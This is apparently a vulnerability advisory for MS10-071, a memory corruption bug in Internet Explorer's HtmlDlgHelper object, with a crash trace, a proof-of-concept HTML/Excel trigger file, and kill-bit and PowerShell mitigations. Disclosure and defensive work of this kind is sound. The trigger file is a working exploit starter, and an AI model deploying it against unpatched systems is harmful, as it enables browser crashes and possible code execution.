Microsoft IE HtmlDlgHelper Class Memory Corruption Vulnerability (MS10-071)

Affected systems:

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0

Description:
Internet Explorer is the web browser bundled by default with the Windows operating system.

There is a memory corruption vulnerability in the way Windows instantiates HtmlDlgHelper class objects (CLASSID: 3050f4e1-98b5-11cf-bb82-00aa00bdce0b) embedded in Office documents (such as .XLS and .DOC files). The vulnerable module is mshtmled.dll in Internet Explorer; the vulnerability is triggered inside mshtmled.dll when uninitialized memory is accessed after the destructor of the CHtmlDlgHelper class has been called. The faulting code is shown below:

mshtmled!ReleaseInterface:
42b919c0 8bff            mov     edi,edi
42b919c2 55              push    ebp
42b919c3 8bec            mov     ebp,esp
42b919c5 8b4508          mov     eax,dword ptr [ebp+8] ss:0023:0013d104=00310065
42b919c8 85c0            test    eax,eax
42b919ca 7406            je      mshtmled!ReleaseInterface+0x12 (42b919d2) [br=0]
42b919cc 8b08            mov     ecx,dword ptr [eax]  ds:0023:00310065
42b919ce 50              push    eax
42b919cf ff5108          call    dword ptr [ecx+8]    ds:0023:7d02029c=2a2c277a

eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

Stack Trace:
<Unloaded_ion.dll>+0x2a2c2779
mshtmled!ReleaseInterface+0x12
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor'+0xd
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27
VBE6!rtcStrConvVar+0xbd65
VBE6!rtcSetDatabaseLcid+0xa823
EXCEL!Ordinal41+0xd2ad0
EXCEL!Ordinal41+0x14082a
USER32!CallWindowProcW+0x1b
Instruction Address: 0x000000002a2c277a

<*Source: Damián Frizza

  Links:
  http://secunia.com/advisories/41271/
  http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption
  http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
  http://www.us-cert.gov/cas/techalerts/TA10-285A.html
*>

Test method:
The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use it at your own risk!

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel">

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Excel.Sheet>
<meta name=Generator content="Microsoft Excel 10">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
x\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
  <o:LastAuthor>TEST</o:LastAuthor>
  <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>
  <o:Version>10.6858</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
  <o:DownloadComponents/>
  </o:OfficeDocumentSettings>
</xml><![endif]-->

<!--[if gte mso 9]><xml>
<x:ExcelWorkbook>
  <x:ExcelWorksheets>
   <x:ExcelWorksheet>
    <x:Name>test</x:Name>
    <x:WorksheetOptions>
     <x:CodeName>Sheet1</x:CodeName>
     <x:Selected/>
     <x:DoNotDisplayGridlines/>
     <x:ProtectContents>False</x:ProtectContents>
     <x:ProtectObjects>False</x:ProtectObjects>
     <x:ProtectScenarios>False</x:ProtectScenarios>
    </x:WorksheetOptions>
   </x:ExcelWorksheet>
  </x:ExcelWorksheets>
  <x:WindowHeight>9345</x:WindowHeight>
  <x:WindowWidth>13260</x:WindowWidth>
  <x:WindowTopX>240</x:WindowTopX>
  <x:WindowTopY>60</x:WindowTopY>
  <x:ProtectStructure>False</x:ProtectStructure>
  <x:ProtectWindows>False</x:ProtectWindows>
</x:ExcelWorkbook>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
  <o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body link=blue vlink=purple>

<table x:str border=0 cellpadding=0 cellspacing=0 width=64 style='border-collapse:
collapse;table-layout:fixed;width:48pt'>
<col width=64 style='width:48pt'>
<tr height=17 style='height:12.75pt'>
  <td height=17 width=64 style='height:12.75pt;width:48pt' align=left
  valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201" coordsize="21600,21600"
   o:spt="201" path="m,l,21600r21600,l21600,xe">
   <v:stroke joinstyle="miter"/>
   <v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"
    o:connecttype="rect"/>
   <o:lock v:ext="edit" shapetype="t"/>
  </v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201" style='position:absolute;
   margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'
   strokecolor="windowText [64]" o:insetmode="auto">
   <![if gte mso 9]><o:title=""/>
   <![endif]><x:ClientData ObjectType="Pict">
    <x:SizeWithCells/>
    <x:CF>Pict</x:CF>
    <x:AutoPict/>
   </x:ClientData>
  </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;
  position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;
  height:17px'><![endif]>

<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object>

<![if !vml]></span><![endif]><span
  style='mso-ignore:vglayout2'>
  <table cellpadding=0 cellspacing=0>
   <tr>
    <td height=17 width=64 style='height:12.75pt;width:48pt'></td>
   </tr>
  </table>
  </span></td>
</tr>
<![if supportMisalignedColumns]>
<tr height=0 style='display:none'>
  <td width=64 style='width:48pt'></td>
</tr>
<![endif]>
</table>
</body>
</html>

Recommendations:

Temporary workaround:

* Prevent the COM object from running in Internet Explorer.

To set the kill bit for the CLSID {3050f4e1-98b5-11cf-bb82-00aa00bdce0b}, paste the following text into a text editor (such as WordPad) and save the file with a .reg file name extension.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}]
"Compatibility Flags"=dword:00000400

Apply this .reg file to an individual system by double-clicking it.
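The .reg file above sets the kill bit on one machine by hand. As an added example (not part of the original advisory or of Microsoft's bulletin), the PowerShell script below audits whether the kill bit is actually present for this CLSID and, with -Apply, sets it without clobbering any other Compatibility Flags bits already in the value. It assumes an elevated PowerShell session on the affected host; the Wow6432Node path is checked only on 64-bit Windows because 32-bit Internet Explorer reads that view of the registry.

```powershell
# Added example, not from the advisory: audit/set the ActiveX kill bit for the
# HtmlDlgHelper CLSID named in the MS10-071 workaround. Run elevated.
param([switch]$Apply)

$Clsid   = '{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}'
$KillBit = 0x400   # bit of "Compatibility Flags" that blocks the control in IE

# Registry views to check; 32-bit IE on 64-bit Windows reads Wow6432Node.
$Paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $Paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-CompatFlags {
    param([string]$Path)
    # Returns the current flags value, or 0 when the key or value is absent.
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Path)
    return (((Get-CompatFlags -Path $Path) -band $KillBit) -ne 0)
}

function Set-KillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    # OR the bit in so any other compatibility flags on the CLSID survive.
    $new = (Get-CompatFlags -Path $Path) -bor $KillBit
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $new `
        -PropertyType DWord -Force | Out-Null
}

foreach ($p in $Paths) {
    if (Test-KillBit -Path $p) {
        Write-Output "kill bit already set: $p"
    } elseif ($Apply) {
        Set-KillBit -Path $p
        Write-Output "kill bit set: $p"
    } else {
        Write-Output "kill bit NOT set (re-run with -Apply to set it): $p"
    }
}
```

Run it without arguments to audit a host, or with -Apply to enforce the workaround; setting the kill bit is only a stopgap until the MS10-071 update below is installed.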

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS10-071) and the corresponding patch for this issue:
MS10-071: Cumulative Security Update for Internet Explorer (2360131)
Link:
http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx?pf=true
